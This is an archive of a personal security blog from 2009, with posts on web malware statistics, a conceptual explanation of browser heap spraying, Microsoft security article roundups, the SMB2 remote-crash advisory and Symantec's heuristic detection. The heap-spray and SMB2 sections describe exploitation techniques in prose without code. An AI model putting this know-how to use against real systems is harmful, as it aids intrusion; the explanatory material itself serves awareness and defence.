Every time we love, every time we give, it’s Christmas time!!
Friday, December 25, 2009
Saturday, November 7, 2009
Increase in Web Malware Activity
There have been many discussions in various Forums, Blogs and Message Boards that the Web has now become the primary vehicle for the Malwares to enter our networks. For more details about such a presentation, please refer to the WebCast “Web Attacks: How Hackers Create and Spread Malware”, presented by Chris McCormack (Web Security Expert - Sophos) and Fraser Howard (Principal Researcher - Sophos). It is very scary, as pointed out in this WebCast, that there is no such thing as a trusted website. Even the most legal site can become the epicenter of spreading out Malware infections. From the popular social networking sites to private/public discussion boards, web sites and blogs, anything can become the harboring ground of these Web Malwares. The table below, taken from Kaspersky Security Bulletin (Statistics 2008), shows the number of Web Malwares detected in some of the popular social networking site. This statistics is compiled by comparing the number of malicious programs that attacked users of different social networking sites.
| Social Networking Site | Malwares Detected (2008) | Registered Users (2008) |
| Odnoklassniki (www.odnoklassniki.ru) | 3302 Malwares | 22000000 Users |
| Orkut (www.orkut.com) | 5984 Malwares | 67000000 Users |
| Bebo (www.bebo.com) | 2375 Malwares | 40000000 Users |
| Livejournal (www.livejournal.com) | 846 Malwares | 18000000 Users |
| Friendster (www.friendster.com) | 2835 Malwares | 90000000 Users |
| Myspace (www.myspace.com) | 7487 Malwares | 253000000 Users |
| Facebook (www.facebook.com) | 3620 Malwares | 140000000 Users |
| Cyworld (us.cyworld.com) | 301 Malwares | 20000000 Users |
| Skyblog (www.skyblog.com) | 28 Malwares | 2200000 Users |
Source: Kaspersky Security Bulletin (Statistics 2008)
Similarly, the below graph shows the sudden increase of Web Malwares activity related with some of the popular social networking sites.
Source: Kaspersky Security Bulletin (Statistics 2008)
Recently it was discovered that social networking sites were getting used as botnet command control. Arbor Network Security reported that, they have identified a Twitter account that was being used as part of an update server for infected systems that were part of a botnet. This account was issuing base 64 encoded tweets that pointed to links where the infected computers could receive malware updates from. Almost similar kinds of botnet command control mechanism were also detected in Tumblr & Jaiku as well. These bots were using RSS feed to get the status updates.
It was pointed out by Google that ‘1% of all search results contained at least one result that point to malicious content and the trend seems to be increasing’. Of the billions of web pages that they have investigated, more than 3 million unique URLs on over 180,000 web sites automatically install Malwares by drive-by download. Shown below are some of the interesting statistics of Malware activity identified in the Web. These interesting trends were observed by the Google Security Team.
Source: Google Online Security Blog
The above graph shows the percentage of daily queries that contain at least one search result identified as Malicious.
Source: Google Online Security Blog
The above graph shows the number of entries in the Google Safe Browsing Malware List. It becomes obvious from these graphs that in the last few years there has been a constant increase of Web related Malwares. The Google research paper on this increasing trend of Web Malware activity, as observed by the Google Security Team, can be referred to from the URL mentioned below in the reference section of this article (Google Research).
Taken from Kaspersky Monthly Malware Statistics, the below table shows the top twenty Web Malwares with new infections detected (highlighted in yellow) and the number of infected web pages.
| Position | Malware Name | Infected Web Pages |
| 1 | Trojan-Downloader.JS.Gumblar.a | 8538 |
| 2 | Trojan-Clicker.HTML.IFrame.kr | 7805 |
| 3 | Trojan-Downloader.HTML.IFrame.sz | 5213 |
| 4 | Trojan-Downloader.JS.LuckySploit.q | 4719 |
| 5 | Trojan-Downloader.HTML.FraudLoad.a | 4626 |
| 6 | Trojan-Downloader.JS.Major.c | 3778 |
| 7 | Trojan-GameThief.Win32.Magania.biht | 2911 |
| 8 | Trojan-Downloader.JS.ShellCode.i | 2652 |
| 9 | Trojan-Clicker.HTML.IFrame.mq | 2576 |
| 10 | Exploit.JS.DirektShow.o | 2476 |
| 11 | Trojan.JS.Agent.aat | 2402 |
| 12 | Exploit.JS.DirektShow.j | 2367 |
| 13 | Exploit.HTML.CodeBaseExec | 2266 |
| 14 | Exploit.JS.Pdfka.gu | 2194 |
| 15 | Trojan-Downloader.VBS.Psyme.ga | 2007 |
| 16 | Exploit.JS.DirektShow.a | 1988 |
| 17 | Trojan-Downloader.Win32.Agent.cdam | 1947 |
| 18 | Trojan-Downloader.JS.Agent.czm | 1815 |
| 19 | Trojan-Downloader.JS.Iframe.ayt | 1810 |
| 20 | Trojan-Downloader.JS.Iframe.bew | 1766 |
Source: Kaspersky Monthly Malware Statistics
Web Malwares have become a major contributor to this growing Malware menace. According to ScanSafe's Annual Threat Report, on an analysis of 200 billion web requests they came to a conclussion that web malware infection surged 582 percent last year, with a significant increase visible toward the last quater of 2008. Security researchers at AVG Technologies have observed that the number of new infected Web sites has grow by 66 percent, from 100,000 to 200,000 per day to 200,000 to 300,000 per day it is expected that this trend would continue in days to come.
Since 2006, the number of Malware signatures of most of the Antivirus vendors has doubled. But with new variants getting created, newer methods of infection and increase in the numbers of distribution points, which are mainly compromised websites, this has resulted in a situation where the Antivirus vendors are now finding it difficult to block these threats, hence, resulting in misses in Malware detection. Earlier Antivirus companies were blocking a major portion of these Malwares with dedicated and generic signatures. However today, it has become literally impossible to block these Malwares with older methodologies. The below statistics (Jan-Jun 2009) shows the misses by some of the major Antivirus engines to detect Malwares and this trend has increased off late.
Source: CommTouch Labs
After calculating an average daily detection rate of some of the major Antivirus vendors, it was revealed by Cyveillance, a cyber-intelligence gathering company, that none of these Antiviruses were going over the 50% mark as far as successful detection is concerned. The top five scores came from McAfee (44 percent), Sophos (38 percent), Dr. Web (36 percent), Symantec (35 percent) and Trend Micro (34 percent). The list also had details of AVG (31 percent), F-Secure (28 percent), ESET (27 percent), Sunbelt (26 percent), F-Prot (23 percent), Norman (23 percent), Kaspersky (18 percent) and VirusBuster (16 percent). Similarly, Panda Security Research also reported that, out of 1.5 million home computers they looked into, only 37.45 percent were correctly protected with an active anti-malware solution with the latest signature database and out of these protected computers, 22.97 percent had active malware infections which were undetected by the anti-malware solution. This is because, more than 52 percent of the Malwares will get reconfigured within 24 hours of its first release so that they can evade signature-based scanners. They also audited a total of 1,206 companies' network. These networks were protected by a variety of different security vendors and in 69.34 percent of the cases they were correctly protected. However they still found thay 71.79 percent systems of these networks were actively infected with Malware.
Heap Spraying
Heap spraying is a technique which is implemented using Javascript and the sole purpose is arbitrary code execution. Although heap spray exploits has been in use since 2001 but since 2005 a more widespread use of this technique is seen in exploits targeted for web malwares. Let us now see what actually heap spraying is and how it is done.
A vulnerable application (in this case, browsers like IE or Firefox), because of certain illegal operation due to badly coded error handling modules, can jump into invalid memory addresses. Once it jumps to those memory addresses it is unable to read data from that invalid memory address resulting in an application crash. When the application crashes it throws a popup as shown below:
Now, depending on the nature of the vulnerablity in the application, we can inject the heap with "nop + shellcode", as much as possible, untill the invalid memory address gets overwritten with "nop + shellcode" and becomes a valid memory. By this we can create a scenario where we can ensure that our custom "shellcode" gets executed the next time a similar illegal operation happens and the application tries to reference that invalid address again. Once we control this behavior with a properly written exploit code, we can successfully use the vulnerability to our advantage to achieve arbitrary code execution. Please refer to the below image for a better understanding of the concepts mentioned above.
However, to successfully achieve arbitrary code exection using heap spray, there is one important things that we need to keep in mind. That is, as per the Windows Memory Layout, address higher than 0x7FFFFFFF falls in the KERNEL ADDRESS SPACE and address lower than 0x7FFFFFFF falls in the USER ADDRESS SPACE. The address of a program heap falls within this USER ADDRESS SPACE i.e the address is less than 0x7FFFFFFF. So during the overwriting of the heap and the invalid memory address, we must keep in mind that we are overwriting memory addresses that fall within the USER ADDRESS SPACE, not the KERNEL ADDRESS SPACE. If we write in memory locations that belong to the KERNEL ADDRESS SPACE, there will be a system crash.
Thursday, October 8, 2009
New Sysinternals Tool - Disk2vhd
A new Sysinternals tool, Disk2vhd, was released yesterday by Mark Russinovich and Bryce Cogswell.
Disk2vhd is a utility that creates VHD (Virtual Hard Disk - Microsoft’s Virtual Machine disk format) versions of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V virtual machines (VMs). The difference between Disk2vhd and other physical-to-virtual tools is that you can run Disk2vhd on a system that’s online. Disk2vhd uses Windows’ Volume Snapshot capability, introduced in Windows XP, to create consistent point-in-time snapshots of the volumes you want to include in a conversion. You can even have Disk2vhd create the VHDs on local volumes, even ones being converted (though performance is better when the VHD is on a disk different than ones being converted).
You can download Disk2vhd from the Sysinternals website. Please refer to the link mentioned at the bottom of this post.
Some screenshots of Disk2vhd
.png "Disk2vhd")
.jpg "Disk2vhd")
Read more from the Sysinternals site (link provided below).
http://technet.microsoft.com/en-us/sysinternals/ee656415.aspx
Cheers Mark!!, once again you gave us an amazing tool.
Wednesday, September 30, 2009
Tuesday, September 22, 2009
Microsoft Security Articles (Sep14-Sep20)
Article Topics & Links:
Microsoft Information Security Tools Team Website | RSS Feed
Anti-XSS Library v3.1 Released! - 17-Sep-2009
Introducing the Connected Information Security Framework and Risk Tracker - 16-Sep-2009
Want to Develop Software Security Tools? - 16-Sep-2009
Want to Shape Great Security Tools ? - 15-Sep-2009
CISF Security Portal Architecture - 15-Sep-2009
Automating Windows Firewall settings with C# (part 2) - 14-Sep-2009
Microsoft Malware Protection Center Website | RSS Feed
The modern rogue - a timely subject - 18-Sep-2009
I can’t go back to yesterday - see you in Geneva - 16-Sep-2009
September in Geneva - 15-Sep-2009
MSRC Ecosystem Strategy Website | RSS Feed
Announcing BlueHat v9: Through the Looking Glass - 14-Sep-2009
Security Bulletins Advisories Website | RSS Feed
Microsoft Security Advisory (975497): Vulnerabilities in SMB Could Allow Remote Code Execution - 9/17/2009 - 17-Sep-2009
Security Bulletins Comprehensive Website | RSS Feed
Microsoft Security Advisory (975497): Vulnerabilities in SMB Could Allow Remote Code Execution - 17-Sep-2009
MS09-047 - Critical: Vulnerabilities in Windows Media Format Could Allow Remote Code Execution (973812) - Version:1.1 - 16-Sep-2009
Security Vulnerability Research and Defense Website | RSS Feed
Update on the SMB vulnerability situation - 18-Sep-2009
OffVis updated, Office file format training video created - 14-Sep-2009
The Security Development Lifecycle Website | RSS Feed
Two New Security Tools for your SDL tool belt (Bonus: a “7-easy-steps” whitepaper) - 16-Sep-2009
Source: Microsoft Blogs
Monday, September 14, 2009
Microsoft Security Articles (Sep07-Sep13)
Security Articles:
Microsoft Information Security Tools Team Website | RSS Feed
How To: Identify Memory Leaks In An Unmanaged Application - 11-Sep-2009
How To: Adding Lots of Users To AD To Setup Testing Environments - 10-Sep-2009
Some Useful SQL Queries for Software Testers - 10-Sep-2009
How to: Restart a Remote Server Using Command Prompt - 09-Sep-2009
How To Publish an ASP.NET Website from a Command Line - 08-Sep-2009
Microsoft Malware Protection Center Website | RSS Feed
Delivering the latest MSRT update - 09-Sep-2009
Microsoft Security Response Center MSRC Website | RSS Feed
September 2009 Security Bulletin Webcast Video and Customer Q and A - 11-Sep-2009
Microsoft Security Advisory 975497 Released - 09-Sep-2009
September 2009 Security Bulletin Release - 08-Sep-2009
Security Bulletins Advisories Website | RSS Feed
Microsoft Security Advisory (975497): Vulnerabilities in SMB Could Allow Remote Code Execution - 9/8/2009 - 08-Sep-2009
Security Bulletins Comprehensive Website | RSS Feed
MS09-048 - Critical: Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (967723) - Version:2.1 - 10-Sep-2009
Microsoft Security Bulletin Summary for September 2009 - 09-Sep-2009
MS09-049 - Critical: Vulnerability in Wireless LAN AutoConfig Service Could Allow Remote Code Execution (970710) - Version:1.1 - 09-Sep-2009
MS09-045 - Critical: Vulnerability in JScript Scripting Engine Could Allow Remote Code Execution (971961) - Version:1.1 - 09-Sep-2009
MS09-035 - Moderate: Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution (969706) - Version:2.3 - 08-Sep-2009
Microsoft Security Bulletin Summary for August 2009 - 08-Sep-2009
MS09-037 - Critical: Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution (973908) - Version:2.0 - 08-Sep-2009
MS09-047 - Critical: Vulnerabilities in Windows Media Format Could Allow Remote Code Execution (973812) - Version:1.0 - 08-Sep-2009
MS09-046 - Critical: Vulnerability in DHTML Editing Component ActiveX Control Could Allow Remote Code Execution (956844) - Version:1.0 - 08-Sep-2009
Security Vulnerability Research and Defense Website | RSS Feed
AutoPlay Windows 7 behavior backported - 12-Sep-2009
Assessing the risk of the September Critical security bulletins - 08-Sep-2009
MS09-048: TCP/IP vulnerabilities - 08-Sep-2009
Forefront Articles:
Forefront Product Suite Website | RSS Feed
CERN replaces Symantec with Forefront - 10-Sep-2009
Video: FPE vs FOPE and Exchange 2010 – Secure messaging with Forefront - 08-Sep-2009
Forefront Server Security Website | RSS Feed
Antigen 8.0 End-of-life and Engine Revision - 10-Sep-2009
Forefront Threat Management Gateway ISA Server Website | RSS Feed
Forefront TMG Network Inspection System Gets Its First 0-Day Signature Release - 10-Sep-2009
Behavioral Change on IE7 can affect Outbound access through ISA Server 2006 that is using Redirect on a Deny Rule - 09-Sep-2009
TMG Network Inspection System (NIS) – “Attention Required” Feature - 07-Sep-2009
Change Tracking in TMG - 07-Sep-2009
Web Publishing Test Button and KCD in TMG - 07-Sep-2009
Forefront Unified Application Gateway UAG Website | RSS Feed
Deep Dive Into DirectAccess – NAT64 and DNS64 In Action - 08-Sep-2009
Source: Microsoft Team Blogs
Wednesday, September 9, 2009
With great power comes great responsibility
Last time I had blogged about “Vulnerabilities in SMB Could Allow Remote Code Execution” (Wednesday, September 9, 2009). Here are few more details about this vulnerability.
Technical Details:
Windows vista and newer Windows comes with a new SMB version named SMB2. SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for further communication. An attacker can remotely crash without no user interaction, any Vista/Windows 7 machine with SMB enable. Windows XP, 2k, are NOT affected as they don't have this driver.
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Win Server 2008 as it use the same SMB2.0 driver (not tested).
About the person who found this vulnerability:
As per Microsoft “Microsoft is concerned that this new report of a vulnerability was not responsibly disclosed, potentially putting computer users at risk.” However, the person who has discovered the vulnerability has a very interesting view and recommendation towards this. As per him “vendor contacted, but no patch available for the moment. Close SMB feature and ports, until a patch is provided.”
Discovering vulnerabilities requires paramount knowledge but releasing details of the vulnerability irresponsibly and then releasing the exploit code as proof of concept is not a prudent action.
 | "With great power comes great responsibility…"Lets not forget this infamous dialog of Peter Parker from the movie Spiderman (2002) :P |
Vulnerabilities in SMB Could Allow Remote Code Execution
Published: September 08, 2009
Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.
Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.
Microsoft is concerned that this new report of a vulnerability was not responsibly disclosed, potentially putting computer users at risk. We continue to encourage responsible disclosure of vulnerabilities. We believe the commonly accepted practice of reporting vulnerabilities directly to a vendor serves everyone's best interests. This practice helps to ensure that customers receive comprehensive, high-quality updates for security vulnerabilities without exposure to malicious attackers while the update is being developed.
Affected Software
- Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2
- Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2
- Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
Non-Affected Software
- Microsoft Windows 2000 Service Pack 4
- Windows XP Service Pack 2 and Windows XP Service Pack 3
- Windows XP Professional x64 Edition Service Pack 2
- Windows Server 2003 Service Pack 2
- Windows Server 2003 x64 Edition Service Pack 2
- Windows Server 2003 with SP2 for Itanium-based Systems
- Windows 7 for 32-bit Systems
- Windows 7 for x64-based Systems
- Windows Server 2008 R2 for x64-based Systems
- Windows Server 2008 R2 for Itanium-based Systems
Information Source:
Thursday, September 3, 2009
Symantec’s “Suspicious.Cloud” Detection
Symantec’s antivirus products contain an highly sensitive detection technology designed to detect entirely new malware threats without traditional signatures. This technology is aimed at detecting malicious software that has been intentionally mutated or morphed by attackers.
If one or more files on your computer have been classified as having a Suspicious.Cloud threat, this indicates that the files have suspicious characteristics and therefore might contain a new or unknown threat. However, given the sensitive nature of this detection technology, it may occasionally identify non-malicious, legitimate software programs (FALSE POSITIVES) that also share these behavioral characteristics. Therefore, it is recommended that users manually check all files detected as Suspicious.Cloud by Symantec antivirus products for potential misidentification, and submit any suspect files to Symantec Security Response for further analysis (refer the below link for Virus Submission to Symantec*).
In rare cases where a legitimate file has been misidentified and subsequently quarantined, your computer may behave abnormally or you may find that one or more applications no longer function as expected. In such rare situations, you should open the Quarantine in your Symantec antivirus product. From here, you may review the list of all files detected as Suspicious.Cloud and, if you identify a potential misidentification, restore the file from quarantine and allow it to run normally.
Original Source:
Subscribe to:
Posts (Atom)
Posts
